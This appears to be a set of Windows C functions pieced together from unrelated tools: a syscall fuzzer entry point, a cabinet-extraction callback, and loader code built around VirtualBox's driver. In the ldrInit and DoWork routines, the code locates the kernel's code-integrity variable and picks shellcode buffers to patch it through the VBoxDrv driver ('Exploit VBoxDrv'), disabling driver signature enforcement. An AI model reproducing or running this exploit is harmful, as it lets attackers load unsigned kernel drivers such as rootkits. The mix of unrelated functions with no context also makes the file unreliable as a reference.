/*
* main
*
* Purpose:
*
* Program entry point: install the vectored exception handler, pick the
* fuzzing target from the first command line parameter (PARAM_WIN32K selects
* fuzz_win32k, anything else fuzz_ntos), optionally enable logging in debug
* builds when the relevant parameter equals PARAM_LOG, then exit.
*
* Always terminates the process with exit code 0, even when the handler could
* not be installed (in which case no fuzzer runs).
*/
void main()
{
    CHAR  szParam[MAX_PATH + 1];
    PVOID hVeh = RtlAddVectoredExceptionHandler(1, &VehHandler);

    if (hVeh != NULL) {
        BOOL bWin32k;

        /* first parameter selects the target */
        RtlSecureZeroMemory(szParam, sizeof(szParam));
        GetCommandLineParamA((LPCSTR)GetCommandLineA(), 1, (LPSTR)&szParam, MAX_PATH, NULL);
        bWin32k = (_strcmpi_a(szParam, PARAM_WIN32K) == 0);

        if (bWin32k) {
            /* for the win32k target the log switch is the second parameter */
            RtlSecureZeroMemory(szParam, sizeof(szParam));
            GetCommandLineParamA((LPCSTR)GetCommandLineA(), 2, (LPSTR)&szParam, MAX_PATH, NULL);
        }

#ifdef _DEBUG
        /* debug builds only: szParam is parameter 2 for win32k, parameter 1 otherwise */
        if (_strcmpi_a(szParam, PARAM_LOG) == 0)
            g_Log = TRUE;
#endif

        if (bWin32k)
            fuzz_win32k();
        else
            fuzz_ntos();

        RtlRemoveVectoredExceptionHandler(hVeh);
    }

    ExitProcess(0);
}
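/*
* fdiNotify
*
* Purpose:
*
* FDI extraction callback. On fdintCOPY_FILE it allocates an in-memory
* destination for the cabinet member whose name matches the lookup name
* carried in the caller-supplied CABDATA; on fdintCLOSE_FILE_INFO it releases
* the per-file record handed back earlier.
*
* Parameters:
*   fdint - notification type.
*   pfdin - notification data; pfdin->pv is the CABDATA* given to FDI by the
*           caller, pfdin->psz1 the member name, pfdin->cb the member size,
*           pfdin->hf the value this callback returned for fdintCOPY_FILE.
*
* Return:
*   fdintCOPY_FILE:       CABDATA* that receives the data, or 0 to skip.
*   fdintCLOSE_FILE_INFO: 1.
*   anything else:        0.
*
* Ownership: the data buffer is passed to the caller through Data->Buffer and
* is NOT freed here; only the CABDATA record (pfdin->hf) is released on close.
*/
INT_PTR DIAMONDAPI fdiNotify(
    FDINOTIFICATIONTYPE fdint,
    PFDINOTIFICATION pfdin
)
{
    INT_PTR Result = 0;
    CABDATA *Data, *ReturnData = NULL;
    LPSTR LookupFileName;

    switch (fdint) {

    case fdintCOPY_FILE:
        if (pfdin->pv == NULL)
            break;

        Data = (CABDATA *)pfdin->pv;

        // The lookup name is read from the Size member; presumably the caller
        // overlays the name at that offset before FDICopy - verify against caller.
        LookupFileName = (LPSTR)&Data->Size;

        // cb is taken from the cabinet header, i.e. external input. A negative
        // value would convert to a huge SIZE_T in LocalAlloc; reject it up front
        // instead of relying on the allocation failing.
        if (pfdin->cb < 0)
            break;

        if (_strcmpi_a(LookupFileName, pfdin->psz1) == 0) {
            ReturnData = LocalAlloc(LPTR, sizeof(CABDATA));
            if (ReturnData) {
                ReturnData->Buffer = LocalAlloc(LPTR, pfdin->cb);
                if (ReturnData->Buffer == NULL) {
                    LocalFree(ReturnData);
                    ReturnData = NULL;
                } else {
                    ReturnData->Offset = 0;
                    ReturnData->Size = pfdin->cb;
                    // Publish the destination to the caller; it now owns Buffer.
                    Data->Buffer = ReturnData->Buffer;
                    Data->Size = ReturnData->Size;
                }
                // NULL here means allocation failed and FDI skips the member.
                return (INT_PTR)ReturnData;
            }
        }
        break;

    case fdintCLOSE_FILE_INFO:
        // Release the CABDATA record returned from fdintCOPY_FILE (not its Buffer).
        LocalFree((HLOCAL)pfdin->hf);
        Result = 1;
        break;

    default:
        break;
    }

    return Result;
}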
/*
* ldrInit
*
* Purpose:
*
* Initialize loader global variables.
*
* Reads the installed VirtualBox version from HKLM\Software\Oracle\VirtualBox,
* selects the matching TsmiPatchDataValue table, then resolves the address of
* the code-integrity policy variable (g_CiEnabled on NT 6.0/6.1 via ntoskrnl.exe,
* g_CiOptions on NT 6.2+ via CI.DLL) and stores it in g_CiVariable.
*
* Parameters:
*   ldrCommand - loader command. Anything other than TSMI_INSTALL returns TRUE
*                right after the registry key check, without touching globals.
*
* Return:
*   TRUE on success (or when not installing); FALSE if the VirtualBox key is
*   missing, the Version value cannot be read, the module list cannot be
*   obtained, the target image cannot be mapped, or the CI variable is not found.
*
* Globals written: g_TsmiPatchDataValue, g_TsmiPatchDataValueSize, g_CiVariable.
* Globals read:    g_osv (OS version used for the ntoskrnl/CI.DLL decision).
*/
BOOL ldrInit(
    DWORD ldrCommand
)
{
    BOOL bResult = FALSE, bFound = FALSE, cond = FALSE;
    DWORD dwSize;
    ULONG rl = 0, c;
    HKEY hKey = NULL;
    LRESULT lRet;
    LONG rel = 0;
    PVOID MappedKernel = NULL;
    ULONG_PTR KernelBase = 0L;
    SIZE_T ModuleSize;
    PLIST_ENTRY Head, Next;
    PLDR_DATA_TABLE_ENTRY Entry;
    PRTL_PROCESS_MODULES miSpace = NULL;
    CHAR KernelFullPathName[MAX_PATH * 2];
    TCHAR szBuffer[MAX_PATH + 1];

    // Single-pass do/while used as a break-out scope; cond is never set to TRUE.
    do {

        lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("Software\\Oracle\\VirtualBox"), 0, KEY_READ, &hKey);

        //
        // If key not exists, return FALSE and loader will exit.
        //
        if ((lRet != ERROR_SUCCESS) || (hKey == NULL)) {
            break;
        }

        //
        // If we are not in install mode - leave here.
        //
        if (ldrCommand != TSMI_INSTALL) {
            bResult = TRUE;
            break;
        }

        //
        // Select default patch table.
        //
        g_TsmiPatchDataValue = TsmiPatchDataValue;
        g_TsmiPatchDataValueSize = sizeof(TsmiPatchDataValue);

        //
        // Read VBox version and select proper table.
        //
        // szBuffer is zeroed and one TCHAR larger than dwSize so the value is
        // NUL-terminated even if the registry string is not.
        //
        RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
        dwSize = MAX_PATH * sizeof(TCHAR);
        lRet = RegQueryValueEx(hKey, TEXT("Version"), NULL, NULL, (LPBYTE)&szBuffer, &dwSize);
        if (lRet != ERROR_SUCCESS) {
            break;
        }

        // Exact-match table selection; an unlisted version keeps the default table.
        if (_strcmpi(szBuffer, TEXT("4.3.16")) == 0) {
            g_TsmiPatchDataValue = &TsmiPatchDataValue_4316;
            g_TsmiPatchDataValueSize = sizeof(TsmiPatchDataValue_4316);
        }
        if (_strcmpi(szBuffer, TEXT("4.3.18")) == 0) {
            g_TsmiPatchDataValue = &TsmiPatchDataValue_4318;
            g_TsmiPatchDataValueSize = sizeof(TsmiPatchDataValue_4318);
        }
        if (_strcmpi(szBuffer, TEXT("4.3.20")) == 0) {
            g_TsmiPatchDataValue = &TsmiPatchDataValue_4320;
            g_TsmiPatchDataValueSize = sizeof(TsmiPatchDataValue_4320);
        }
        if (
            (_strcmpi(szBuffer, TEXT("4.3.22")) == 0) ||
            (_strcmpi(szBuffer, TEXT("4.3.24")) == 0)
            )
        {
            g_TsmiPatchDataValue = &TsmiPatchDataValue_4322_24;
            g_TsmiPatchDataValueSize = sizeof(TsmiPatchDataValue_4322_24);
        }
        if (_strcmpi(szBuffer, TEXT("4.3.26")) == 0) {
            g_TsmiPatchDataValue = &TsmiPatchDataValue_4326;
            g_TsmiPatchDataValueSize = sizeof(TsmiPatchDataValue_4326);
        }

        //
        // Enumerate loaded drivers.
        //
        // supGetSystemInfo returns a process-heap allocation; freed below.
        //
        miSpace = supGetSystemInfo(SystemModuleInformation);
        if (miSpace == NULL) {
            break;
        }
        if (miSpace->NumberOfModules == 0) {
            break;
        }

        //
        // Query system32 folder.
        //
        // NOTE(review): only rl == 0 is rejected. A return value >= MAX_PATH means
        // the directory did not fit and rl is the required size, so the writes at
        // [rl] and [rl + 1] below would land past the copied prefix (the buffer is
        // MAX_PATH * 2). Rejecting rl >= MAX_PATH as well would close that gap.
        //
        RtlSecureZeroMemory(KernelFullPathName, sizeof(KernelFullPathName));
        rl = GetSystemDirectoryA(KernelFullPathName, MAX_PATH);
        if (rl == 0) {
            break;
        }
        KernelFullPathName[rl] = (CHAR)'\\';

        //
        // For vista/7 find ntoskrnl.exe
        //
        // Modules[0] is assumed to be the kernel image on NT 6.0/6.1.
        //
        bFound = FALSE;
        if (g_osv.dwMajorVersion == 6) {
            if (g_osv.dwMinorVersion < 2) {
                _strcpy_a(&KernelFullPathName[rl + 1], (const char*)&miSpace->Modules[0].FullPathName[miSpace->Modules[0].OffsetToFileName]);
                KernelBase = (ULONG_PTR)miSpace->Modules[0].ImageBase;
                bFound = TRUE;
            }
        }

        //
        // For 8+, 10 find CI.DLL
        //
        // KernelBase stays 0 if CI_DLL is not in the module list; nothing below
        // checks for that before the dsfQuery* calls, and bFound is not updated.
        //
        if (bFound == FALSE) {
            _strcpy_a(&KernelFullPathName[rl + 1], CI_DLL);
            for (c = 0; c < miSpace->NumberOfModules; c++)
                if (_strcmpi_a((const char *)&miSpace->Modules[c].FullPathName[miSpace->Modules[c].OffsetToFileName], CI_DLL) == 0) {
                    KernelBase = (ULONG_PTR)miSpace->Modules[c].ImageBase;
                    break;
                }
        }

        HeapFree(GetProcessHeap(), 0, miSpace);
        miSpace = NULL;

        //
        // Map ntoskrnl/CI.DLL in our address space.
        //
        // DONT_RESOLVE_DLL_REFERENCES: the image is mapped for reading only, no
        // DllMain or imports are run.
        //
        MappedKernel = LoadLibraryExA(KernelFullPathName, NULL, DONT_RESOLVE_DLL_REFERENCES);
        if (MappedKernel == NULL) {
            break;
        }

        if (g_osv.dwMajorVersion == 6) {

            // Find g_CiEnabled Vista, Seven
            if (g_osv.dwMinorVersion < 2) {

                // Query module size via PEB loader for bruteforce.
                // Walks the PEB InLoadOrderModuleList under the loader lock to
                // find the SizeOfImage of the mapping we just created.
                ModuleSize = 0;
                EnterCriticalSection((PRTL_CRITICAL_SECTION)NtCurrentPeb()->LoaderLock);
                Head = &NtCurrentPeb()->Ldr->InLoadOrderModuleList;
                Next = Head->Flink;
                while (Next != Head) {
                    Entry = CONTAINING_RECORD(Next, LDR_DATA_TABLE_ENTRY, InLoadOrderLinks);
                    if (Entry->DllBase == MappedKernel) {
                        ModuleSize = Entry->SizeOfImage;
                        break;
                    }
                    Next = Next->Flink;
                }
                LeaveCriticalSection((PRTL_CRITICAL_SECTION)NtCurrentPeb()->LoaderLock);

                // Module not found, abort.
                if (ModuleSize == 0) {
                    break;
                }
                rel = dsfQueryCiEnabled(&KernelBase, MappedKernel, (DWORD)ModuleSize);
            }
            else {
                // Find g_CiOptions w8+
                rel = dsfQueryCiOptions(&KernelBase, MappedKernel);
            }
        }
        else {
            // Otherwise > NT6.x, find g_CiOptions 10+
            rel = dsfQueryCiOptions(&KernelBase, MappedKernel);
        }

        // rel == 0 is treated as "not found"; KernelBase is expected to have been
        // updated in place by the dsfQuery* helper (defined elsewhere).
        if (rel == 0)
            break;

        g_CiVariable = KernelBase;
        bResult = TRUE;

    } while (cond);

    // Cleanup on every path; miSpace is NULL here unless an early break left it set.
    if (hKey) {
        RegCloseKey(hKey);
    }
    if (miSpace != NULL) {
        HeapFree(GetProcessHeap(), 0, miSpace);
    }
    if (MappedKernel != NULL) {
        FreeLibrary(MappedKernel);
    }

    return bResult;
}
/*
* DoWork
*
* Purpose:
*
* Locate the code-integrity policy variable (g_CiEnabled on NT 6.0/6.1 in
* ntoskrnl.exe, g_CiOptions on NT 6.2+ in CI.DLL), pick the payload buffer
* for the requested operation and OS version, and pass both to ControlDSE.
*
* Parameters:
*   hDevice  - device handle, passed through to ControlDSE.
*   bDisable - TRUE selects scDisable; FALSE selects scEnableVista7 on NT 6.0/6.1
*              and scEnable8Plus otherwise.
*
* Return:
*   Result of ControlDSE, or FALSE if any preceding step fails.
*
* Globals read: osv (OS version), scDisable, scEnable8Plus, scEnableVista7.
*
* Emits "[DF] ..." trace lines through OutputDebugStringA. These are visible
* to an attached debugger or any debug-output listener and are a reliable
* artefact of this routine running.
*/
BOOL DoWork(
    HANDLE hDevice,
    BOOL bDisable
)
{
    BOOL bRes = FALSE, bFound, cond;
    ULONG rl = 0, c;
    LONG rel = 0;
    PVOID scBuffer = NULL, MappedKernel = NULL;
    ULONG_PTR KernelBase = 0L;
    SIZE_T ModuleSize;
    PLIST_ENTRY Head, Next;
    PLDR_DATA_TABLE_ENTRY Entry;
    PRTL_PROCESS_MODULES miSpace;
    CHAR KernelFullPathName[BUFFER_SIZE];
    CHAR szOdsText[BUFFER_SIZE];

    // Single-pass do/while used as a break-out scope; cond stays FALSE.
    cond = FALSE;
    do {

        //
        // Enumerate loaded drivers.
        //
        // miSpace is assigned before any break, so the cleanup below is safe.
        //
        miSpace = supGetSystemInfo(SystemModuleInformation);
        if (miSpace == NULL) {
            break;
        }
        if (miSpace->NumberOfModules == 0) {
            break;
        }

        //
        // NOTE(review): only rl == 0 is rejected. A return >= MAX_PATH means the
        // directory did not fit and rl is the required size, so the writes at
        // [rl] and [rl + 1] below index past the copied prefix. Whether that stays
        // inside the buffer depends on BUFFER_SIZE (not visible here) - confirm,
        // or reject rl >= MAX_PATH as well.
        //
        RtlSecureZeroMemory(KernelFullPathName, sizeof(KernelFullPathName));
        rl = GetSystemDirectoryA(KernelFullPathName, MAX_PATH);
        if (rl == 0) {
            break;
        }
        KernelFullPathName[rl] = (CHAR)'\\';

        // Trace: "[DF] Windows v<major>.<minor>"
        _strcpy_a(szOdsText, "[DF] Windows v");
        ultostr_a(osv.dwMajorVersion, _strend_a(szOdsText));
        _strcat_a(szOdsText, ".");
        ultostr_a(osv.dwMinorVersion, _strend_a(szOdsText));
        OutputDebugStringA(szOdsText);

        //
        // For vista/7 find ntoskrnl.exe
        //
        // Modules[0] is assumed to be the kernel image on NT 6.0/6.1.
        //
        bFound = FALSE;
        if (osv.dwMajorVersion == 6) {
            if (osv.dwMinorVersion < 2) {
                _strcpy_a(&KernelFullPathName[rl + 1], (const char*)&miSpace->Modules[0].FullPathName[miSpace->Modules[0].OffsetToFileName]);
                KernelBase = (ULONG_PTR)miSpace->Modules[0].ImageBase;
                bFound = TRUE;
            }
        }

        //
        // For 8+, 10 find CI.DLL
        //
        // KernelBase stays 0 if CI_DLL is not in the module list; nothing below
        // checks for that before the dsfQuery* calls, and bFound is not updated.
        //
        if (bFound == FALSE) {
            _strcpy_a(&KernelFullPathName[rl + 1], CI_DLL);
            for (c = 0; c < miSpace->NumberOfModules; c++)
                if (_strcmpi_a((const char *)&miSpace->Modules[c].FullPathName[miSpace->Modules[c].OffsetToFileName], CI_DLL) == 0) {
                    KernelBase = (ULONG_PTR)miSpace->Modules[c].ImageBase;
                    break;
                }
        }

        HeapFree(GetProcessHeap(), 0, miSpace);
        miSpace = NULL;

        // Trace: target path and the base reported by the module list.
        // NOTE(review): szOdsText and KernelFullPathName share BUFFER_SIZE, so the
        // "[DF] Target module " prefix plus the full path can exceed szOdsText if
        // the path is long - confirm BUFFER_SIZE leaves headroom.
        _strcpy_a(szOdsText, "[DF] Target module ");
        _strcat_a(szOdsText, KernelFullPathName);
        OutputDebugStringA(szOdsText);
        _strcpy_a(szOdsText, "[DF] Module base ");
        u64tohex_a(KernelBase, _strend_a(szOdsText));
        OutputDebugStringA(szOdsText);

        //
        // Map ntoskrnl/CI.DLL in our address space.
        //
        // DONT_RESOLVE_DLL_REFERENCES: read-only mapping, no DllMain/imports run.
        //
        MappedKernel = LoadLibraryExA(KernelFullPathName, NULL, DONT_RESOLVE_DLL_REFERENCES);
        if (MappedKernel == NULL) {
            break;
        }

        //
        // Check if we are in NT6.x branch
        //
        if (osv.dwMajorVersion == 6) {

            //
            // Find g_CiEnabled Vista, Seven
            //
            if (osv.dwMinorVersion < 2) {

                //
                // Query module size via PEB loader for bruteforce.
                //
                // Walks the PEB InLoadOrderModuleList under the loader lock to
                // find the SizeOfImage of the mapping we just created.
                //
                ModuleSize = 0;
                EnterCriticalSection((PRTL_CRITICAL_SECTION)NtCurrentPeb()->LoaderLock);
                Head = &NtCurrentPeb()->Ldr->InLoadOrderModuleList;
                Next = Head->Flink;
                while (Next != Head) {
                    Entry = CONTAINING_RECORD(Next, LDR_DATA_TABLE_ENTRY, InLoadOrderLinks);
                    if (Entry->DllBase == MappedKernel) {
                        ModuleSize = Entry->SizeOfImage;
                        break;
                    }
                    Next = Next->Flink;
                }
                LeaveCriticalSection((PRTL_CRITICAL_SECTION)NtCurrentPeb()->LoaderLock);

                //
                // Module not found, abort.
                //
                if (ModuleSize == 0) {
                    break;
                }
                rel = dsfQueryCiEnabled(&KernelBase, MappedKernel, (DWORD)ModuleSize);
            }
            else {
                //
                // Find g_CiOptions w8+
                //
                rel = dsfQueryCiOptions(&KernelBase, MappedKernel);
            }
        }
        else {
            //
            // Otherwise > NT6.x, find g_CiOptions 10+
            //
            rel = dsfQueryCiOptions(&KernelBase, MappedKernel);
        }

        // rel == 0 is treated as "not found"; KernelBase is expected to have been
        // updated in place by the dsfQuery* helper (defined elsewhere).
        if (rel == 0)
            break;

        _strcpy_a(szOdsText, "[DF] Apply patch to address ");
        u64tohex_a(KernelBase, _strend_a(szOdsText));
        OutputDebugStringA(szOdsText);

        //
        // Select proper shellcode buffer
        //
        if (bDisable) {
            scBuffer = (PVOID)scDisable;
        }
        else {
            //
            // Shellcode for 8/10+
            //
            scBuffer = (PVOID)scEnable8Plus;
            if (osv.dwMajorVersion == 6) {
                //
                // Shellcode for vista, 7
                //
                if (osv.dwMinorVersion < 2) {
                    scBuffer = (PVOID)scEnableVista7;
                }
            }
        }

        //
        // Exploit VBoxDrv.
        //
        bRes = ControlDSE(hDevice, KernelBase, scBuffer);

    } while (cond);

    // Cleanup on every path; miSpace is NULL here unless an early break left it set.
    if (MappedKernel != NULL) {
        FreeLibrary(MappedKernel);
    }
    if (miSpace != NULL) {
        HeapFree(GetProcessHeap(), 0, miSpace);
    }

    return bRes;
}